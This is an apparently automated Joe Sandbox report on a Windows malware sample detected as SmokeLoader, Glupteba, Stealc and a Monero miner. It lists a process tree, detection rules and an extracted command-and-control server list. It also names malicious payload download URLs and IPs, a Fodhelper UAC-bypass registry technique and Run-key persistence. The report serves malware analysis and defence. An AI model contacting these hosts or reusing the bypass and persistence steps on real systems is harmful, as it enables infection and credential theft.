Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IIBXMzS0zN.exe

Overview

General Information

Sample name:IIBXMzS0zN.exe
renamed because original name is a hash value
Original sample name:f35c060b3ac3b38cff5fc9131e794f93.exe
Analysis ID:1389372
MD5:f35c060b3ac3b38cff5fc9131e794f93
SHA1:af4ee5521fec5c34ddc5311d71d47e6b8be71d3d
SHA256:fea7f052ee9f727d0ecb888eef78674e1220c73276010a9cd6d68c4d9d260f4b
Tags:exe
Infos:

Detection

Glupteba, SmokeLoader, Socks5Systemz, Stealc, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected Glupteba
Yara detected SmokeLoader
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Xmrig cryptocurrency miner
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with benign system names
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
May use the Tor software to hide its network traffic
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Process Parents
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • IIBXMzS0zN.exe (PID: 7856 cmdline: C:\Users\user\Desktop\IIBXMzS0zN.exe MD5: F35C060B3AC3B38CFF5FC9131E794F93)
    • explorer.exe (PID: 640 cmdline: C:\Windows\Explorer.EXE MD5: 574AF6D80FE7CC6422A8592DE7A39F78)
      • 5A89.exe (PID: 7504 cmdline: C:\Users\user\AppData\Local\Temp\5A89.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • 5A89.exe (PID: 7556 cmdline: C:\Users\user\AppData\Local\Temp\5A89.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • 6056.exe (PID: 7620 cmdline: C:\Users\user\AppData\Local\Temp\6056.exe MD5: 50F2E865696BEEB3C20E1F05DC72D03C)
        • WerFault.exe (PID: 3316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 640 MD5: F5210A4A7E411A1BAD3844586A74B574)
      • 6374.exe (PID: 820 cmdline: C:\Users\user\AppData\Local\Temp\6374.exe MD5: 1996A23C7C764A77CCACF5808FEC23B0)
      • regsvr32.exe (PID: 5724 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\6653.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 2108 cmdline: /s C:\Users\user\AppData\Local\Temp\6653.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • 78A4.exe (PID: 5872 cmdline: C:\Users\user\AppData\Local\Temp\78A4.exe MD5: 7176404D8394DECDC9399BB62C01A2FF)
        • 78A4.tmp (PID: 1624 cmdline: "C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp" /SL5="$801FA,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe" MD5: 426607EDCEEC6A310076FA659B073D1D)
          • 78A4.exe (PID: 1852 cmdline: "C:\Users\user\AppData\Local\Temp\78A4.exe" /SPAWNWND=$10490 /NOTIFYWND=$801FA MD5: 7176404D8394DECDC9399BB62C01A2FF)
            • 78A4.tmp (PID: 2040 cmdline: "C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp" /SL5="$18004E,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe" /SPAWNWND=$10490 /NOTIFYWND=$801FA MD5: 426607EDCEEC6A310076FA659B073D1D)
              • anyburnfree.exe (PID: 6156 cmdline: "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i MD5: EB428F0ECD8AD6907A62E6A0ACEAB53F)
              • anyburnfree.exe (PID: 2324 cmdline: "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s MD5: EB428F0ECD8AD6907A62E6A0ACEAB53F)
      • 914D.exe (PID: 2532 cmdline: C:\Users\user\AppData\Local\Temp\914D.exe MD5: CEAE65EE17FF158877706EDFE2171501)
        • InstallSetup4.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" MD5: 28B72E7425D6D224C060D3CF439C668C)
          • BroomSetup.exe (PID: 4632 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 5E94F0F6265F9E8B2F706F1D46BBD39E)
            • cmd.exe (PID: 4832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
          • Conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
        • FourthX.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
          • powershell.exe (PID: 4152 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs MD5: DFD66604CA0898E8E26DF7B1635B6326)
            • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
      • csrss.exe (PID: 5684 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • csrss.exe (PID: 2572 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • AD52.exe (PID: 5348 cmdline: C:\Users\user\AppData\Local\Temp\AD52.exe MD5: BA79778FB5C76EE86A3719452732A68B)
      • B68B.exe (PID: 2000 cmdline: C:\Users\user\AppData\Local\Temp\B68B.exe MD5: 5F11B580F135B8479A48BDF6000C31CE)
        • WerFault.exe (PID: 1208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 356 MD5: F5210A4A7E411A1BAD3844586A74B574)
      • Conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
  • egiibgt (PID: 7436 cmdline: C:\Users\user\AppData\Roaming\egiibgt MD5: F35C060B3AC3B38CFF5FC9131E794F93)
  • 6374.exe (PID: 1144 cmdline: "C:\Users\user\AppData\Local\Temp\6374.exe" MD5: 1996A23C7C764A77CCACF5808FEC23B0)
  • svchost.exe (PID: 1904 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5892 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7620 -ip 7620 MD5: F5210A4A7E411A1BAD3844586A74B574)
      • Conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)
    • WerFault.exe (PID: 3804 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2000 -ip 2000 MD5: F5210A4A7E411A1BAD3844586A74B574)
  • svchost.exe (PID: 2328 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\BroomSetup.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        C:\Users\user\AppData\Local\Temp\914D.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
        • 0x8ad454:$s1: Runner
        • 0x8ad5b9:$s3: RunOnStartup
        • 0x8ad468:$a1: Antis
        • 0x8ad495:$a2: antiVM
        • 0x8ad49c:$a3: antiSandbox
        • 0x8ad4a8:$a4: antiDebug
        • 0x8ad4b2:$a5: antiEmulator
        • 0x8ad4bf:$a6: enablePersistence
        • 0x8ad4d1:$a7: enableFakeError
        • 0x8ad5e2:$a8: DetectVirtualMachine
        • 0x8ad607:$a9: DetectSandboxie
        • 0x8ad632:$a10: DetectDebugger
        • 0x8ad641:$a11: CheckEmulator

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000025.00000002.1910346635.00000000001F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        0000001A.00000002.3843084252.0000000002CB1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
            • 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
            00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              Click to see the 28 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              37.2.AD52.exe.1f0e67.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                37.2.AD52.exe.400000.1.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  37.3.AD52.exe.2d30000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    17.2.6374.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      17.2.6374.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                      • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x10170:$s2: Elevation:Administrator!new:
                      Click to see the 7 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\5A89.exe, ProcessId: 7556, TargetFilename: C:\ProgramData\Drivers\csrss.exe
                      Sigma detected: Suspicious Process Parents
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ParentImage: C:\ProgramData\Drivers\csrss.exe, ParentProcessId: 5684, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 2572, ProcessName: csrss.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 3980, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 4152, ProcessName: powershell.exe
                      Sigma detected: System File Execution Location Anomaly
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 640, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 5684, ProcessName: csrss.exe
                      Sigma detected: Conhost Spawned By Uncommon Parent Process
                      Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\Conhost.exe, NewProcessName: C:\Windows\System32\Conhost.exe, OriginalFileName: C:\Windows\System32\Conhost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 640, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7504, ProcessName: Conhost.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\5A89.exe, ProcessId: 7556, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CSRSS
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\egiibgt, CommandLine: C:\Users\user\AppData\Roaming\egiibgt, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\egiibgt, NewProcessName: C:\Users\user\AppData\Roaming\egiibgt, OriginalFileName: C:\Users\user\AppData\Roaming\egiibgt, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Users\user\AppData\Roaming\egiibgt, ProcessId: 7436, ProcessName: egiibgt
                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\5A89.exe, ProcessId: 7556, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 3980, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 4152, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1904, ProcessName: svchost.exe

                      Snort Signatures

                      Timestamp:192.168.2.3172.67.221.3549717802019714 02/08/24-19:08:47.917372
                      SID:2019714
                      Source Port:49717
                      Destination Port:80
                      Protocol:TCP
                      Classtype:Potentially Bad Traffic
                      Timestamp:192.168.2.3104.21.80.171497154432050574 02/08/24-19:08:47.171628
                      SID:2050574
                      Source Port:49715
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.31.1.1.154225532050567 02/08/24-19:08:47.042247
                      SID:2050567
                      Source Port:54225
                      Destination Port:53
                      Protocol:UDP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.391.215.85.12049711802039103 02/08/24-19:08:47.388216
                      SID:2039103
                      Source Port:49711
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://5.42.64.33/ping.php?substr=fourAvira URL Cloud: Label: malware
                      Source: http://cbinr.com/forum/Plugins/cred64.dllAvira URL Cloud: Label: malware
                      Source: http://cbinr.com/forum/index.php?scr=1Avira URL Cloud: Label: malware
                      Source: http://185.172.128.127/syncUpd.exeAvira URL Cloud: Label: malware
                      Source: http://cbinr.com/forum/Plugins/clip64.dllAvira URL Cloud: Label: malware
                      Source: http://sjyey.com/tmp/index.phpAvira URL Cloud: Label: malware
                      Source: https://liabilityarrangemenyit.shop/apiAvira URL Cloud: Label: malware
                      Source: https://claimconcessionrebe.shop/apiAvira URL Cloud: Label: phishing
                      Source: http://emgvod.com/emd/1.jpgAvira URL Cloud: Label: malware
                      Source: https://secretionsuitcasenioise.shop/apiAvira URL Cloud: Label: malware
                      Source: http://185.172.128.19/288c47bbc1871b439df19ff4df68f0776.exeAvira URL Cloud: Label: malware
                      Source: https://gemcreedarticulateod.shop/apiAvira URL Cloud: Label: phishing
                      Source: http://185.172.128.90/cpa/ping.php?substr=four&s=abAvira URL Cloud: Label: malware
                      Source: http://emgvod.com/uploads/logo3.jpgAvira URL Cloud: Label: phishing
                      Source: http://asx.sunaviat.com/data/pdf/may.exeAvira URL Cloud: Label: malware
                      Source: http://selebration17io.io/index.phpAvira URL Cloud: Label: malware
                      Source: http://cbinr.com/forum/index.phpAvira URL Cloud: Label: malware
                      Source: http://trmpc.com/check/index.phpAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\Drivers\csrss.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeReversingLabs: Detection: 79%
                      Source: C:\Users\user\AppData\Local\Temp\4312.exeReversingLabs: Detection: 37%
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeReversingLabs: Detection: 54%
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Temp\6653.dllReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeReversingLabs: Detection: 21%
                      Source: C:\Users\user\AppData\Local\Temp\C338.exeReversingLabs: Detection: 100%
                      Source: C:\Users\user\AppData\Local\Temp\EE8C.exeReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Temp\FourthX.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\egiibgtReversingLabs: Detection: 81%
                      Multi AV Scanner detection for submitted file
                      Source: IIBXMzS0zN.exeReversingLabs: Detection: 81%
                      Yara detected Glupteba
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.2d80e67.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.288c47bbc1871b439df19ff4df68f076.exe.3670000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.1932113759.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.1834912962.0000000003AB2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1943821340.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Machine Learning detection for dropped file
                      Source: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exeJoe Sandbox ML: detected
                      Source: C:\ProgramData\Drivers\csrss.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: IIBXMzS0zN.exeJoe Sandbox ML: detected
                      Source: 5A89.exe, 00000008.00000003.2943136260.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_10ae3bad-5

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 17.2.6374.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.6374.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY

                      Privilege Escalation

                      barindex
                      UAC bypass detected (Fodhelper)
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeRegistry value created: DelegateExecute
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeRegistry value created: NULL "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

                      Bitcoin Miner

                      barindex
                      Yara detected Glupteba
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.2d80e67.8.unpack, type: UNPACKEDPE
